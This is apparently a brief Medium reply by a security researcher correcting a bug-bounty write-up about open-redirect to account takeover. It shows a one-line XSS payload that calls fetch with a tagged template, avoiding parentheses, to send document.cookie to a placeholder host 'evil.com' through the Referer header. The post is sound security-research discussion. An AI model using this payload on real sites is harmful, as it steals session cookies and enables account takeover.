This is not true.

For stealing cookies you need to make a request to your server with cookies but we can’t use fetch or XMLHttpRequest because both require Parentheses.[After one day of searching I came to know that the website uses jquery so I added my own javascript…

Open-redirect to Account Takeover.

471

Rishabh

terjanq

1 min readFeb 24, 2020

This is not true. You can call fetch without parentheses quite easily. E.g. fetch`//evil.com/${{referrer:document.cookie}}` will send cookies to the attacker via Referer: header.

Written by terjanq

980 Followers

8 Following

Security enthusiast that loves playing CTFs and hunting for bugs in the wild. Also likes to do some chess once in a while. twitter.com/terjanq

Responses (1)

Help
Status
About
Careers
Press
Blog
Privacy
Terms
Text to speech
Teams